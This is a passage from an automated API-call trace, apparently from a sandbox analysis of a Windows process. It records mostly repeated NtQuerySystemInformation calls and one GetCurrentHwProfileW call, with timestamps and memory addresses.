SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdf00, Length=0x38, ResultLength=0x0) [0187.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdf00, Length=0x38, ResultLength=0x0) [0187.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.802] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdf00, Length=0x38, ResultLength=0x0) [0187.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdf00, Length=0x38, ResultLength=0x0) [0187.803] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdf00, Length=0x38, ResultLength=0x0) [0187.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdf00, Length=0x38, ResultLength=0x0) [0187.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.804] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe0f8, Length=0x30, ResultLength=0x0) [0187.805] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe030, Length=0x28, ResultLength=0x0) [0187.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fded0, Length=0x20, ResultLength=0x0) [0187.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde80, Length=0x20, ResultLength=0x0) [0187.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.806] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.807] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe000, Length=0x28, ResultLength=0x0) [0187.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdeb0, Length=0x28, ResultLength=0x0) [0187.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.808] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdf58, Length=0x30, ResultLength=0x0) [0187.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde58, Length=0x48, ResultLength=0x0) [0187.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde58, Length=0x48, ResultLength=0x0) [0187.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde58, Length=0x48, ResultLength=0x0) [0187.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde58, Length=0x48, ResultLength=0x0) [0187.809] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe0f8, Length=0x30, ResultLength=0x0) [0187.810] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe030, Length=0x28, ResultLength=0x0) [0187.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fded0, Length=0x20, ResultLength=0x0) [0187.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.811] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.812] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe000, Length=0x28, ResultLength=0x0) [0187.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde80, Length=0x28, ResultLength=0x0) [0187.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde90, Length=0x18, ResultLength=0x0) [0187.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.813] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdf00, Length=0x38, ResultLength=0x0) [0187.814] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdf00, Length=0x38, ResultLength=0x0) [0187.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdf00, Length=0x38, ResultLength=0x0) [0187.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.815] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe0f8, Length=0x30, ResultLength=0x0) [0187.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe030, Length=0x28, ResultLength=0x0) [0187.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fded0, Length=0x20, ResultLength=0x0) [0187.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde80, Length=0x20, ResultLength=0x0) [0187.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.816] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe000, Length=0x28, ResultLength=0x0) [0187.817] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde80, Length=0x28, ResultLength=0x0) [0187.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde90, Length=0x18, ResultLength=0x0) [0187.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.818] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.819] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.820] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe0f8, Length=0x30, ResultLength=0x0) [0187.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe030, Length=0x28, ResultLength=0x0) [0187.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fded0, Length=0x20, ResultLength=0x0) [0187.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde80, Length=0x20, ResultLength=0x0) [0187.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.821] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe000, Length=0x28, ResultLength=0x0) [0187.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde80, Length=0x28, ResultLength=0x0) [0187.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.822] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.823] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe0f8, Length=0x30, ResultLength=0x0) [0187.824] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe030, Length=0x28, ResultLength=0x0) [0187.824] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fded0, Length=0x20, ResultLength=0x0) [0187.824] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde80, Length=0x20, ResultLength=0x0) [0187.824] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.824] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.824] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.824] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe000, Length=0x28, ResultLength=0x0) [0187.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde80, Length=0x28, ResultLength=0x0) [0187.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde90, Length=0x18, ResultLength=0x0) [0187.825] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.826] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe0f8, Length=0x30, ResultLength=0x0) [0187.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe030, Length=0x28, ResultLength=0x0) [0187.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fded0, Length=0x20, ResultLength=0x0) [0187.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde80, Length=0x20, ResultLength=0x0) [0187.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.827] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe000, Length=0x28, ResultLength=0x0) [0187.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde80, Length=0x28, ResultLength=0x0) [0187.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.828] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdf00, Length=0x38, ResultLength=0x0) [0187.829] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdf00, Length=0x38, ResultLength=0x0) [0187.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdf00, Length=0x38, ResultLength=0x0) [0187.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.830] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe0f8, Length=0x30, ResultLength=0x0) [0187.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe030, Length=0x28, ResultLength=0x0) [0187.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fded0, Length=0x20, ResultLength=0x0) [0187.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde80, Length=0x20, ResultLength=0x0) [0187.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.831] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.832] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.833] GetCurrentHwProfileW (in: lpHwProfileInfo=0xf7a67fdf20 | out: lpHwProfileInfo=0xf7a67fdf20) returned 1 [0187.833] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdee0, Length=0x38, ResultLength=0x0) [0187.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe0f8, Length=0x30, ResultLength=0x0) [0187.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe030, Length=0x28, ResultLength=0x0) [0187.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fded0, Length=0x20, ResultLength=0x0) [0187.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde80, Length=0x20, ResultLength=0x0) [0187.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.834] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.835] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fe000, Length=0x28, ResultLength=0x0) [0187.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fde80, Length=0x28, ResultLength=0x0) [0187.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0187.836] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0188.280] 